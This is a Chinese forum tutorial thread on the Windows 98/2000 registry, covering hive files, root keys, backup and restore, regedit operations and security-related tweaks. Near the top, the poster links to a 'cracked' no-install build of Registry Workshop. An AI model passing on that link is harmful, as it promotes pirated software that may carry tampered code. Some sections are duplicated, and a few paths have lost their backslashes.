看贴前的忠告
1.注册表是Windows的核心数据库,对它的修改都是危险动作,所以涉及注册表的修改,请三思而行,一定要清楚自己在做什么、如果出问题怎样挽救,之后再出手。
2.对有些问题,自己动手一次,强过请教别人十次。
3.尽量少用所谓的优化软件,它在某些方面确实很有效,但问题也很多(反正闻道长安很少用,认为它们都是准病毒——啊啊个人观点)。
4.对一些危险的工具,如PM、刷BIOS之类,第一次使用尽量在老鸟的指导下干,看看网上这类工具的受害者比比皆是就应该警觉。
5.我发现一个有趣的现象:每当微软的Update网站有补丁更新,老鸟一般都会马上去升级,而偏偏是菜鸟满不在乎,认为没意思。这些补丁是最基本的东东,应该及时升级!你是不是觉得老鸟的机子总不出毛病啊,而自己的机子今天这个不行,明天那个出错——这是根本的原因之一。
注册表的专题
本帖子是为了提供会员便于参考和学习注册表的使用与维护的方方面面,彻底地解决了注册表学习的盲目性、被动性,从注册表的基础知识开始,逐步展开深入分析注册表的结构。
当你熟悉注册表时,你会发现原来注册表是这么好玩的。
本主题有关内容都转自:
http://act.it.sohu.com/book/slis ... ss2=50&optype=1
[下载]我常用的爱用的注册表编辑器《Registry Workshop》(免安装破解版),现在提供给大家一个下载地址:
http://www.cydown.com/soft/5247.htm[声明]“注册表特别分析篇”大部分是我本人原创,水平有限,如果大家发现其中有不足和编写有误的地方,请联系我,并给于指正和补充。或者您有不错的相关技术技巧文章,不凡拿出来分享啊。。。
[提醒]欢迎浏览我的注册表专题。你是2K或XP系统的吗?你的“远程注册表操作”服务关了没?你应该明白这可是一个危险的漏洞哦。如何关闭它呢?:控制面板 > 管理工具 > 服务 > Remote Registry Service,先把它停用,然后再设置为“已禁用”。
[主题目录树]
▲入门基础
1、了解注册表及对注册表进行编辑的路径
2、WIN98注册表编辑器的常用操作
3、注册表由来
4、注册表及其备份与恢复
5、注册表功能的扩展
6、了解注册表结构
7、win2000注册表
▲注册表操作与安全
8、禁用危险的远程注册表
9、修改注册表加强Win 2000安全
10、“注册表错误”也出错
11、浏览网页注册表被修改之迷及解决办法
12、增强网络功能的另类招法—修改注册表
13、注册表妙用三则
14、巧用注册表保安全
15、注册表内的安全和用户权限设置
16、注册表修改指南
17、修改注册表,完善你的系统
18、修改注册表使电脑更个性化
19、巧用NT注册表
20、注册表的文件关联及应用
▲注册表特别分析篇(for 2000/xp)
1、对一个注册表项的粗略分析(转)
2、EditFlags的含义
3、详解右键关联菜单
4、自定义“运行”命令
5、揭开失踪的IE进程之谜
6、消除应用软件的乱码显示(转)
7、不登录编辑其他用户配置信息(转)
了解注册表及对注册表进行编辑的路径
介绍了几期的注册表修改技巧,相信大家对注册表的功能有了很深的认识,但是我们在改的时候不一定了解为什么要这样改,这样改的原理是什么?注册表与Windows 98系统的关系是什么?接下来的几期我们将带你了解注册表的详细情况,使你深入到系统内部。
首先我们来看看注册表与Windows 98文件系统的关系。
Windows 98的注册表Registry由以下的六个文件组成:
1.系统配置的注册表文件System.dat
在Windows 9x的系统目录c:\windows中有一个隐含、系统、只读文件System.dat,它是Windows 98注册表的一部分,该文件具有如下作用:
1)描述单一的PC配置。
2) 描述安装在单一PC上的消息。
3)安装即插即用类型的设备硬件配置,如设备的I/O地址、IRQ级和DMA通道等等的情况。这个文件在Windows 98的网络运行状态时,保存在本地的工作站或本地PC机系统中。在Windows 98的安装期间,Setup将首先检查你的计算机上已经安装了的硬件设备,然后在System.dat中建立适当的配置项。若从现有的Windows 3.x中升级安装Windows 98,则Setup将把现有的System.ini 、Reg.dat文件中的部分设置项拷贝到System.dat中,以保持系统的设置。
我们经常使用“控制面板”的“系统”图标来修改系统的硬件设备和配置情况,这个时候我们进行的操作都是从System.dat中读取的系统属性设置。这个文件的作用很类似于Windows 3.x中的System.ini文件。
2.系统配置的注册表备份文件System.da0
Windows 98的注册表的一个非常重要的特点就是可靠性强,稳定不易损坏。这就需要靠注册表的备份文件system.da0。
系统配置注册表System.dat的备份文件为System.da0,该文件在System.dat文件遭到意外破坏时,将由系统在启动的时候自动拷贝为System.dat。这对于并不稳定的Windows 98系统来说是非常重要的,至少给系统提供了一点重要的稳定机制。
3.用户平台配置的注册表文件User.dat
在Windows 98的系统目录c:\windows中有一个隐含、系统、只读文件User.dat,它也是Windows 98的注册表的重要组成部分,这个文件具有这样的作用:
1)它定义用户优先权,如用户平台设置,运行级等等。
2)特定于某一个用户的应用程序的安装信息,应用程序的使用信息等等。如果你是使用局域网的话,当你在Windows 98中使用网络时,Us dat必须放在网络服务器上。对于单机来说,配置了网络属性的是保存在本机的系统目录下的。
在你第一次输入用户名和密码时,Windows 98程序将把这些信息存储在User.dat中,同时你的Windows 98的系列号也存储在USER.DAT中。如果用户在“控制面板”的“密码”图标中选择了“用户可自定义首选项及桌面设置登录时,Windows自动启用个人设置”这个选项后,Windows 98系统将会为每个用户创建他自己的User.Dat,并且把它保存为C:\Windows\Profiles\用户名\User.dat。在用户每次登录后,他自己的User.dat就会被调入到系统中,同时启动自己相应的程序信息。该文件的作为类似于Windows 3.x 系统中的Win.ini文件。
4.用户平台配置的注册表备份文件User.da0
用户平台配置的注册表文件User.dat也有一个备份文件User.da0。当User.dat遭到意外破坏时,将由系统将User.da0拷贝为User.dat,从而使User.dat得到了恢复。
5.网络管理注册表文件Config.pol
Config.pol文件是一个隐含、系统、只读文件,它主要用于Windows 98的网络用户的管理方面的策略。
如果你在Windows 98系统里安装了“系统策略编辑器”后,则用户可以使用Config.pol文件中的限制来决定系统用户的操作权限如执行程序、修改注册表等等,这也就是说,系统根据Config.pol文件中的设置对网络用户的操作作一些限制,这种限制在Windows 98系统中被称为“策略”。
6.网络管理注册表备份文件Config.po0
Config.pol也有一个备份文件Config.po0,它是一个隐含、系统、只读文件。它存放在网络服务器中。重要是在config.pol损坏时起到恢复作用。
看了注册表的文件组成,我们再来看看Windows 98系统注册表Registry与INI文件之间的关系
注册表Registry与Windows 98中的INI文件有许多相似之处。注册表中的键或子键类似于INI文件中的小节,一个键值项对应于INI文件中小节里的一条设置项。
但是我们还是很容易发现他们之间的区别的:首先Registry可以包括子键,而INI文件不支持小节的嵌套;其次Registry中的键值项还可以包含可执行代码,而在INI文件中设置项只是简单的字串;第三是在同一台计算机上有多个用户,Registry可以存储每个用户的特性,而INI文件中却不可能做到。
如果你的计算机系统是从Windows 3.x上升级到Windows 98的,则安装程序会从System.ini和Win.ini文件文件中选择一些系统设置信息放入到注册表中。不过,为了与以前的Windows版本上的老式16位应用程序保持兼容,INI文件中的有些设置项不能迁移到Windows 98的注册表中。
1).注册表中有关Win.ini的信息
有关Win.ini的信息的所有的子键都处于注册表的HKEY_CURRENT_USER根键中。在HKEY_CURRENT_USER子键分支下能看到[desktop] GridGranularity Control Panel\desktop ;Pattern Control Panel\desktop ;
TileWallPaper Control Panel\desktop ;
[windows] ScreenSaveActive Control Panel\desktop ;ScreenSaveTimeOut Control Panel\desktop
[Sounds] Sound Event Name AppEvents\Schemes\Apps\.Default\Sound Event Name\.current
[Hearts] Name Software\Microsoft\Windows\CurrentVersion\Applets\Hearts 等在Win.ini文件中的信息
2).注册表中有关System.ini的信息
有关System.ini的信息的子键都处于注册表的HKEY_LOCAL_MACHINE根键中。根据机器的网络配置,有些系统可能不会出现某些子键。我们打开HKEY_LOCAL_MACHINE目录分支可以看到这些相关的信息。如
[Network]
Comment System\CurrentControlSet\Services\VxD\VNETUP
ComputerName System\CurrentControlSet\Control\ComputerName\ComputerName
EnableSharing
LMAnnounce System\CurrentControlSet\Services\VxD\VNETUP
LogonDomain
Logon Validated
MaintainServerList System\CurrentControlSet\Control\ComputerName\ComputerName
Reconnect
Reshare
Username Network\Logon
Workgroup System\CurrentControlSet\Control\ComputerName\ComputerName
[386Enh] Network
Transport Software\Microsoft\Windows\CurrentVersion\Network\Real Mode Net
在这里只是简单的介绍了注册表与Windows 98文件系统和INI文件之间的一些关系,这对于我们深入认识Windows 98系统并解决相关的问题很有帮助,在后面我们将详细介绍有关注册表的知识和更多的修改技巧。
了解了关于注册表的基本内容之后,我们就可以正式进入我们所要讨论的话题了:对注册表进行编辑修改!一般来说,要想对注册表进行增、删、改,可以有以下三种途径:
第一种途径:直接修改(最不安全,但最直接最有效)
就是通过注册表编辑器直接的来修改注册表的键值数据项,这样做会避免在注册表中留下垃圾(虽然都很小,但越来越多会拖慢系统速度),但是要求用户有一定的注册表知识,熟悉注册表内部结构而且一定要小心谨慎。
注册表编辑器是一个可以让你改变系统注册设定的高级工具WIN98注册表编辑器的常用操作注册表编辑器是一个可以让你改变系统注册设定的高级工具,有经验的Windows用户可以通过编辑注册表改变系统设定。
启动注册表编辑器的方法是执行Windows文件夹下的REGEDIT.EXE(在WINNT和Windows 2000中还有REGEDIT32.EXE)。
下面详细介绍Win98注册表编辑器常用的操作。
(一)、恢复注册表
1.单击“开始”,再单击“关闭系统”;
2.单击“重新启动计算机并切换到MS-DOS方式”,然后单击“是”;
3.进入Windows目录下。例如,如果你的Windows安装在C:\Windows目录下,应键入以下内容CD C:\WINDOWS后回车;
4.在MS-DOS模式下键入C:\WINDOWS\COMMAND\SCANREG/RESTORE后回车。
按照上述步骤,可以将注册表恢复到最后一次启动计算机时的状态。
(二)、将注册表中的所有内容导出到一个文本文件中
1.在注册表编辑器中单击“我的电脑”将导出所有注册表信息,或者单击一个文件夹仅仅导出该文件夹下内容的注册信息;
2.在“注册表”菜单上单击“导出注册表文件”;
3.单击“浏览”为导出的文件寻找一个存储位置,即文件夹,然后为之输入一个文件后保存。
这样导出的注册表信息文件,可以在任何一种文本编辑器中编辑。
(三)、导入或局部导入注册表
1.在“注册表”菜单中,单击“导入注册表文件”;
2.单击“浏览”找到要导入的文件,然后单击“打开”。
(四)、添加主键
1.打开注册表列表,找到要添加主键的文件夹;
2.右击要加入主键的文件夹;
3.将鼠标指向“编辑”菜单下的“新建”,然后单击“主键”;
4.新的主键是以一个临时名字显示的,为新的主键输入一个名字,然后回车即可;如果添加新的主键后,导致了计算机不能正确启动的情况,可以恢复注册表信息。
(五)、添加键值
1.打开注册表列表,选中要添加新键值的文件夹;
2.右击要添加新键值的文件夹;
3.将鼠标指向“新建”,然后单击需要添加键值的类型。这些类型包括“字符串值”、“二进制值”和“DWORD”值;
4.新添加的键值以一个临时键值显示,为新添加的键值输入一个新的值,然后回车即可。
第二种途径:软件修改(安全)。利用各种工具软件,完成对注册表的编辑工作...
WIN98注册表编辑器的常用操作
WIN98注册表编辑器的常用操作注册表编辑器是一个可以让你改变系统注册设定的高级工具,有经验的Windows用户可以通过编辑注册表改变系统设定。
启动注册表编辑器的方法是执行Windows文件夹下的REGEDIT.EXE。如果注册表中有错误,计算机可能不能正常运行。如果发生这种情况,可以将注册表信息恢复到上次启动计算机时的状态。下面详细介绍Win98注册表编辑器常用的操作。
一、恢复注册表
1.单击“开始”,再单击“关闭系统”;
2.单击“重新启动计算机并切换到MS-DOS方式”,然后单击“是”;
3.进入Windows目录下。例如,如果你的Windows安装在C:Windows目录下,应键入以下内容CD C:WINDOWS后回车;
4.在MS-DOS模式下键入C:WINDOWSCOMMANDSCANREG/RESTORE后回车。
按照上述步骤,可以将注册表恢复到最后一次启动计算机时的状态。
二、将注册表中的所有内容导出到一个文本文件中
1.在注册表编辑器中单击“我的电脑”将导出所有注册表信息,或者单击一个文件夹仅仅导出该文件夹下内容的注册信息;
2.在“注册表”菜单上单击“导出注册表文件”;
3.单击“浏览”为导出的文件寻找一个存储位置,即文件夹,然后为之输入一个文件后保存。
这样导出的注册表信息文件,可以在任何一种文本编辑器中编辑。
三、导入或局部导入注册表
1.在“注册表”菜单中,单击“导入注册表文件”;
2.单击“浏览”找到要导入的文件,然后单击“打开”。
四、添加主键
1.打开注册表列表,找到要添加主键的文件夹;
2.右击要加入主键的文件夹;
3.将鼠标指向“编辑”菜单下的“新建”,然后单击“主键”;
4.新的主键是以一个临时名字显示的,为新的主键输入一个名字,然后回车即可;如果添加新的主键后,导致了计算机不能正确启动的情况,可以恢复注册表信息。
五、添加键值
1.打开注册表列表,选中要添加新键值的文件夹;
2.右击要添加新键值的文件夹;
3.将鼠标指向“新建”,然后单击需要添加键值的类型。这些类型包括“字符串值”、“二进制值”和“DWORD”值;
4.新添加的键值以一个临时键值显示,为新添加的键值输入一个新的值
注册表由来
PC机及其操作系统的一个特点就是允许用户按照自己的要求对计算机系统的硬件和软件进行各种各样的配置。早期的图形操作系统,如Win3.x中,对软硬件工作环境的配置是通过对扩展名为.ini的文件进行修改来完成的,但INI文件管理起来很不方便,因为每种设备或应用程序都得有自己的INI文件,并且在网络上难以实现远程访问。
为了克服上述这些问题,在Windows 95及其后继版本中,采用了一种叫做“注册表”的数据库来统一进行管理,将各种信息资源集中起来并存储各种配置信息。按照这一原则,Windows各版本中都采用了将应用程序和计算机系统全部配置信息容纳在一起的注册表,用来管理应用程序和文件的关联、硬件设备说明、状态属性以及各种状态信息和数据等。
与INI文件不同的是:
1.注册表采用了二进制形式登录数据;
2.注册表支持子键,各级子关键字都有自己的“键值”;
3.注册表中的键值项可以包含可执行代码,而不是简单的字串;
4.在同一台计算机上,注册表可以存储多个用户的特性。
注册表的特点有:
1.注册表允许对硬件、系统参数、应用程序和设备驱动程序进行跟踪配置,这使得修改某些设置后不用重新启动成为可能。
2.注册表中登录的硬件部分数据可以支持高版本Windows的即插即用特性。当Windows检测到机器上的新设备时,就把有关数据保存到注册表中,另外,还可以避免新设备与原有设备之间的资源冲突。
3.管理人员和用户通过注册表可以在网络上检查系统的配置和设置,使得远程管理得以实现。
我们在前面已经详细介绍了注册表的由来与基本结构。发现注册表比较复杂,但又安排得非常有条理,能有效地提高工作效率,为系统的维护提供了必要条件。由于注册表是一个二进制的配置数据库文件(Windows的命根子),因而,用户无法直接存取注册表。为了让高级用户能够编辑注册表,Windows2000提供了注册表编辑器“c”和“Regedt32”。对这种只使用Windows提供的注册表编辑器进行编辑的操作。
编辑器在安装Windows时已经被安装到硬盘中了,但是并未在“附件”程序组中建有快捷方式。用户如果需要使用注册表编辑器,可以在“运行”对话框内输入Regedt32或Regedit即可打开注册表编辑器,如图:
或者在“命令提示符”中执行Regedt32.exe也可以进入注册表编辑器,如图:
注册表及其备份与恢复
Windows9x取代DOS已成为操作系统的当然之选。随着功能的丰富,Windows9x所需管理的细节也远远超过DOS。用户不能仅用修改AUTOEXEC或CONFIG来调整如今Windows的配置与状态。它们需要以一种新的方式来存储、分类和编辑。于是,让无数用户“改”心大动的注册表应运而生。用户通过使用,从而更深入了解并掌握Windows9x。由于在Windows9x中采用了注册表方式,使用户可以按自己的要求对计算机系统的硬件和软件进行灵活配置。(本专题中关于注册表的一些技巧在Windows98下调试通过,有的改动后直接起作用,有的需要重新启动计算机后才生效,虽然是在Windows98下调试,但有很多技巧也适用于Windows95和Windows NT)
一、Windows注册表
1.什么是注册表?
注册表是 Windows 的一个内部数据库,是一个巨大的树状分层的数据库。它容纳了应用程序和计算机系统的全部配置信息、系统和应用程序的初始化信息、应用程序和文档文件的关联关系、硬件设备的说明、状态和属性以及各种状态信息和数据。注册表中存放着各种参数,直接控制着Windows的启动、硬件驱动程序的装载以及一些Windows应用程序的运行,从而在整个Windows系统中起着核心作用。它包括如下一些内容:
(1)软、硬件的有关配置和状态信息,注册表中保存有应用程序和资源管理器外壳的初始条件、首选项和卸载数据。
(2)联网计算机的整个系统的设置和各种许可、文件扩展名与应用程序的关联关系,硬件部件的描述、状态和属性。
(3)性能记录和其它底层的系统状态信息,以及其它一些数据。
如果注册表受到了破坏,轻者使Windows在启动的过程出现异常,重者可能会导致整个系统的完全瘫痪。因此正确地认识、使用,特别是及时备份以及有问题时恢复注册表,对Windows用户来说就显得非常重要了。
2.注册表文件:.DAT
Windows98将所有注册表文件存入2个文件System.dat和User.dat中。它们是二进制文件,不能用文本编辑器打开查看。它们存于Windows目录下,具有隐含、系统和只读属性。 System.dat包含了计算机特定的配置数据,如安装的硬件和设备驱动程序的有关信息等。User.dat包含了用户特定的数据,如桌面设置,墙纸和窗口颜色设置等。User.dat文件的位置在以某个用户名登录时,其位于C\Windows\profiles\用户名目录下,系统同时在C\Windows目录下保留了一个缺省的User.dat文件,以备新用户使用。
说明:System.da0和User.da0这两个文件属于Windows95,是注册表的备份文件,它们在系统每次成功启动后创建。在Windows98中,注册表检查器将备份文件做成CAB文件。
二、注册表编辑器——Registry Editor
1.打开注册表编辑器
注册表的打开方式很简单,单击Windows“开始”按钮,找到“运行”,鼠标左键单击。在弹出的运行对话框中填入 regedit,按“确定”按钮即可。
我们可以看到,在注册表中,所有的数据都是通过一种树状结构以键和子键的方式组织起来,十分类似于目录结构。每个键都包含了一组特定的信息,每个键的键名都是和它所包含的信息相关的。
2.注册表编辑器的基本操作
注册表编辑器有一些基本操作命令,在这里以当前使用的Desktop为例来说明注册表编辑器的基本操作。
(1) 打开HKEY_CURRENT_USER\Control Panel\desktop\WindowMetrics,在右边的窗口中是一些名称和数据。
(2)用鼠标右键单击编辑器右边的窗格,会弹出一个快捷菜单,可以选择它来创建一个主键、一个字符串、一个二进制值或者一个DWORD值。
(3)右击编辑器左边窗格的desktop关键字,会弹出另一个快捷菜单,在这里,你可以创建一个新的主键、串值、二进制值或者DWORD值,还可以进行查找、删除和重命名等操作。
(4)双击编辑器右边的窗格中的关键字名,将会弹出一个编辑窗口,在那儿可以调整常量的值,或者删除该常量,以及进行重命名等,比如双击字符串“ScreenSaveActive”,弹出如图2的对话框。
三、注册表的备份与恢复
在安装新的应用程序或添加新硬件时都可能搞乱系统的注册表,从而引发不测,所以应该定期地备份user.dat和system.dat文件(编者:在进行注册表修改之前,强烈建议你先备份注册表,以防修改过程误操作引起系统崩溃)。
在Windows98中的Windows目录下,仍有System.dat和User.dat两个文件用来存放系统注册表信息。下面笔者就根据自己的使用体会来谈谈在Windows98中对注册表进行备份及恢复的几种常用方法。
1.直接进行备份与恢复
这是一种很原始的方法,即直接将所需之System.dat及User.dat两个文件拷贝存放在硬盘某个指定目录下或直接拷到软盘上作为备份,恢复时再将该备份替换覆盖回原处即可,当然在备份及恢复时都需对这两个文件的只读及隐藏属性进行相应的修改操作,让隐藏文件显示出来。
说明:如因注册表问题而导致系统瘫痪,开机后无法进入Windows系统时,可用应急启动盘进入Windows98自带的DOS界面后,用常规的DOS操作来将存在硬盘或软盘中的备份覆盖回原处,恢复备份的注册表数据。
2.注册表编辑器的导出与引入
运行Regedit.exe打开Windows98注册表后,利用“注册表”的“导出”及“引入”功能也可以用来备份或恢复注册表信息。具体方法为:在“注册表编辑器”窗口中点击左上角“注册表”下拉菜单,点击“导出注册表文件……”项,在出现的“导出注表文件”对话框中,键入欲备份注册表的文件名及其保存位置,再按“保存”按钮即可。需恢复注册表时,用同样的方法打开注册表编辑器,打开“注册表”下拉菜单后点击“引入注册表文件……”项,在出现的对话框中选中所需恢复的备份文件,再按“打开”按钮即可将该注表备份恢复回Windows系统了。
说明:该方法主要适合于Windows系统还未瘫痪或可以通过安全模式启动Windows98系统时恢复注册表之用,如因注册表问题而无法进入Windows系统时,则该法就无能为力了。
3.系统的注册表自动备份
在Windows98中,取消了Windows 95中每次开机时自动以System.da0和User.da0为名的两个文件来备份注册表数据的功能,而新增加了一个以.Cab(Cabinet)作后缀的压缩文件作为注册表备份的功能,具体使用如下:
该备份过程是由Windows98系统自动完成的。在用户当天第一次开机时,Windows98将会自动将系统中原有的注表信息,包括System.dat、User.dat、System.ini和Win.ini这四个文件都压缩成Cab形式的文件,在Windows\Sysbacup 目录下会有诸如rb000.cab和rb001.cab之类的压缩文件,这几个就是最近的五个系统备份(Windows\Sysbckup是隐藏目录,要查看须让隐藏的文件和目录显示出来)。系统自动保存最近5次开机的注册表数据。
一般说来,当Windows98安装好后,会在启动时自动运行Scanregw.exe/autorun,目的是每天备份一次注册表。你可以在开始选单上选择运行“Msconfig”,运行Microsoft的系统配置程序,点“启动”选项,查看该命令是否运行。倘若该命令没有被运行,则运行注册表编辑器“Regedit”,在“HKEY_LOCAL_MACHINE\Soft ware\Microsoft\Windows\CurrentVersion\Run”主键下新建一个字符串值,键值为“C\Windows\scanregw.exe/autorun”(这里假设Windows98安装目录为C\Windows)。这样,Windows98就会自动备份最近5次的注册表,以rb00.cab形式存放在C\Windows\Sysbckup\路径下。
注册表功能的扩展
Windows注册表,是关系到整个Windows系统“生死存亡”的重要文件,注册表一但出现问题,轻者导致软件无法正常运行,重者可能导致整个操作系统崩溃,最后只能重装操作系统。那么怎样才能使注册表比较安全呢?主要的方法之一就是备份注册表,然后就是不让他人随便修改注册表。下面就本人在使用电脑时的一些小技巧写出来与大家一同分享!
1.让Windows 95具有Windows 98自动备份注册表的功能
首先在装有Windows 98的计算机上将Windows目录下的Scanregw.exe文件和Scanreg.ini文件拷贝到Windows95计算机的Windows目录中,然后运行Regedit.exe文件修改注册表,在HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run下添加一字符串ScanRegistry并将其键值设为C:\WINDOWS\scanregw.exe/autorun,最后重新启动计算机即可。备份后的文件是以cab结尾的压缩文件,存放在Windows目录下的Sysbckup隐含子目录下系统默认的文件名是rb000.cab、rb001.cab、rb002.cab、rb003.cab、rb004.cab,使用时可以用解压软件打开或用DOS下的Extract命令解开。
2.去掉Windows Me中注册表的记忆功能
用过Windows Me的用户可能已经发现Windows Me中的Regedit.exe(修改注册表的工具)具有记忆功能,它能记住上次用户修改或查看注册表的具体地方,有些用户可能想去掉这个讨厌的功能,以便保护个人隐私,经过笔者的试验将此功能屏蔽了。具体的做法就是将Window98下的Windows目录中的Regedit.exe拷贝到Windows Me相应的Windows目录中即可(在拷贝前请将Windows Me中原有的Regedit.exe改名为Regedit1.exe)。
3.让Windows 95的DOS方式下能具有Windows 98 DOS方式下的修复、备份和恢复备份注册表的功能
在Windows 98中的纯DOS方式下修复注册表,使用的命令是Scanreg.exe,但是在Windows 95下的纯DOS方式下却没有这一功能,经过笔者的试验,只要将Windows 98系统中Windows目录下的Command目录中的Scanreg.exe拷贝到Windows 95的相应目录即可。修复注册表的具体命令是canreg /fix,备份注册表的具体命令是:scanreg /backup,恢复注册表的具体命令是:scanreg /restore。
4.防止非法用户使用注册表编辑器
有时为了使系统注册表变得更加安全,可以设法防止别人修改注册表,具体做法是运行注册表编辑器在HKEY_CURRENT_USER\Software\Microsoft \Windows\CurrentVersion\Policies\System下新建一个名为DisableRegistryTools的DWORD值,并将其值改为“1”即可。若要想重新使用注册表编辑器,请在任何一种文本编辑器中将下列内容输入其中并存为Regtools.reg文件:
REGEDIT4
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000000
(注:在REGEDIT4后面一定要空一行),然后在用鼠标双击Regtools.reg文件,并将其导入注册表即可。有时为了防止一些电脑高手也使用此种方法解除对注册表编辑器的限制,就得使.reg文件不能用系统默认的方式打开,具体的修改方法是运行注册表编辑器将HKEY_CLASSES_ROOT\.reg下的默认值改为“txtfile”这样就可对.reg文件进行限制了。这时用户自己也无法将.reg文件加入注册表中,同时也没法使用注册表编辑器了。经过笔者的进一步研究,只要在事先编辑好的Regtools.reg文件上按住Shift键的同时,按下鼠标右键选择打开方式,从中选取Regedit打开就可以了,这样即可将Regtools.reg导入注册表。要想真正完全限制用户,只能借用第三方软件。
了解注册表结构
在Windows98的注册表中,所有的数据都是通过一种树状结构以键和子键的方式组织起来,就象我们的磁盘文件系统的目录结构一样。每个键都包含了一组特定的信息,每个键的键名都是和它所包含的信息相关联的。如果某个键包含了子键,则在注册表编辑器窗口中代表这个键的文件夹的左边将有“+”符号,以表示在这个文件夹中有更多的内容。如果这个文件夹被用户打开了,那么这个“+”就会变成“-”,我们可以象打开文件夹一样层层的打开注册表树,当然我们有时并不清楚我们要找的键在哪个目录分支下面,我们就得搜索相应的关键字。我们来看看注册表树最顶层的六个分支所分别代表的含义,这样我们在修改的时候就可以做到心中有数了。
1.HKEY_CLASSES_ROOT
管理文件系统。根据在Windows 98中安装的应用程序的扩展名,该根键指明其文件类型的名称,相应打开该文件所要调用的程序等等信息。
2.HKEY_CURRENT_USER
管理系统当前的用户信息。在这个根键中保存了本地计算机中存放的当前登录的用户信息,包括用户登录用户名和暂存的密码。在用户登录Windows 98时,其信息从HKEY_USERS中相应的项拷贝到HKEY_CURRENT_USER中。
3.HKEY_LOCAL_MACHINE
管理当前系统硬件配置。在这个根键中保存了本地计算机硬件配置数据,此根键下的子关键字包括在SYSTEM.DAT中,用来提供HKEY_LOCAL_MACHINE所需的信息,或者在远程计算机中可访问的一组键中。
这个根键里面的许多子键与System.ini文件中设置项类似。
4.HKEY_USERS
管理系统的用户信息。在这个根键中保存了存放在本地计算机口令列表中的用户标识和密码列表。同时每个用户的预配置信息都存储在HKEY_USERS根键中。HKEY_USERS是远程计算机中访问的根键之一。
5.HKEY_CURRENT_CONFIG
管理当前用户的系统配置。在这个根键中保存着定义当前用户桌面配置(如显示器等等)的数据,该用户使用过的文档列表(MRU),应用程序配置和其他有关当前用户的Windows 98中文版的安装的信息。
6.HKEY_DYN_DATA
管理系统运行数据。在这个根键中保存了系统在运行时的动态数据,此数据在每次显示时都是变化的,因此,此根键下的信息没有放在注册表中。
在Windows98 ... 这些键值项数据可分为如下三种类型:
1.字符串值(S)
在Windows98的注册表中,表示文件的描述、硬件的标识等等信息一般都用字符串值。字符串值由字母和数字组成,它的最大长度不能超过255个字符。通过键、键值就组成了一种键值项数据,这就相当于Win.ini、Ssytem.ini文件中每个小节下面的设置行一样的道理。
2.二进制值(B)
在Windows的注册表中,二进制值是没有长度限制的,可以是任意个字节长。在注册表编辑器中,二进制以十六进制的方式显示出来。
3.DWORD值(D)
在Windwos98的注册表中,DWORD值是一个32位(双字节长)长度的数值。在注册表编辑器中,系统以十六进制的方式显示DWORD值。
在修改中这么多子键并不一定都用得作,其中对我们最有用还是 HKEY_LOCAL_MACHINE和 HKEY_USERS这两个键下面的子键:
我们先看看 HKEY_LOCAL_MACHINE键先面的几个重要的子键及其作用:
1)HKEY_LOCAL_MACHINE\software\microsoft\windows\currentVersion\uninstall 保存Windows98系统中已经安装了的Windows应用程序卸载信息。
2)HKEY_LOCAL_MACHINE\system\currentControl-Set\control\keyboard Layouts 保存Windows98中键盘使用的语言以及各种中文输入法的信息。
3)HKEY_LOCAL_MACHINE\software\microsoft\windows\currentVersion\explorer\user shell folders 保存计算机中个人文件夹、收藏夹的路径。
4)HKEY_LOCAL_MACHINE\system\CurrentControlSet\services\class 保存控制面板-增添硬件设备-设备类型目录,全面管理你的硬件信息。
5)HKEY_LOCAL_MACHINE\software\microsoft\windows\currentVersion\run 保存由控制面板设定的计算机启动时运行程序的名称,其图标显示在任务条右边。这也是我们经常修改和用到的一个目录。
6)HKEY_LOCAL_MACHINE\software\microsoft\windows\currentVersion\Policies\Ratings 保存了IE的“安全”\“分级审查”中设置的口令(数据加密),若遗忘了口令,删除 Ratings 中的数据即可解决问题。
7)HKEY_LOCAL_MACHINE\software\microsoft\windows\currentVersion\explorer\desktop\nameSpace 保存桌面中特殊的图标,如回收站、收件箱、网上邻居等等,你可以把它改得面目全非,人家都认不出来。
先面我们再来看看另外一个重要的键HKEY_USERS下面的重要分支:
1)HKEY_USERS\.Default\so..\microsoft\windows\current-Version\explorer\RunMRU保存“开始 \ 运行...”中运行的程序列表信息。清除文档菜单时该分支将被清空。
2)HKEY_USERS\.Default\software\microsoft\internet explorer\typeURLs保存IE4.0浏览器地址栏中输入的URL地址列表信息。清除文档菜单时它也将被清空。
3)HKEY_USERS\.Default\so..\microsoft\windows\current-Version\explorer\RecentDocs 保存最近使用的十五个(数目是可以修改的)文档的快捷方式,清除文档菜单时将被清空。
4)HKEY_USERS\.default\software\microsoft\windows\currentVersion\applets 保存Windows98应用程序的记录数据信息。
win2000注册表
Windows注册表概述
注册表是Windows系统存储关于计算机配置信息的数据库,包括了系统运行时需要调用的运行方式的设置。Windows注册表中包括的项目有:每个用户的配置文件、计算机上安装的程序和每个程序可以创建的文档类型、文件夹和程序图标的属性设置、系统中的硬件、正在使用的端口等。
注册表按层次结构来组织,由项、子项、配置单元和值项组成。注册表中包括如下各项:
●HKEY_CURRENT_USER:包含当前登录用户的配置信息的根目录。用户文件夹、屏幕颜色和“控制面板”设置存储在此处。该信息被称为用户配置文件。
●HKEY_USERS:包含计算机上所有用户的配置文件的根目录。HKEY_CURRENT_USER是HKEY_USERS的子项。
●HKEY_LOCAL_MACHINE:包含针对该计算机(对于任何用户)的配置信息。
●HKEY_CLASSES_ROOT:是HKEY_LOCAL_MACHINE\Software的子项。此处存储的信息可以确保当使用Windows资源管理器打开文件时,将使用正确的应用程序打开对应的文件类型。
●HKEY_CURRENT_CONFIG:包含本地计算机在系统启动时所用的硬件配置文件信息。
对于注册表的修改,需要使用专门的编辑器完成,在Windows中为我们提供了这个工具。而在Win2000中微软新提供了一个针对多用户系统的注册表编辑器,这就是我们本期将主要介绍的内容。
在此要特别强调一点:一般来讲注册表不须要用户自己修改,因为其中包括了Windows启动和运行所必须的全部配置,错误的设置将会导致应用程序无法运行、系统出错,直至系统崩溃或无法启动。如果需要对注册表进行编辑,务必事先进行注册表项目备份!
Win2000中的注册表编辑器
在Win2000中,系统提供了两个注册表编辑工具,一个是从Win9x延续下来的,一个是新版本操作系统提供的。在此我们要介绍的是后者。
1.程序的启动
单击系统开始按钮,在关联菜单中选择“运行”命令,激活相关界面。在其中的文本框中输入“regedt32”,并击回车键确定,即可启动程序,其界面形式如图1所示。
2.向注册表中添加新的项或子项
如果需要将一些系统运行设置添加到系统注册表中,而这些信息又不是以*.reg格式提供的,此时只能使用注册表编辑器完成,具体步骤如下:
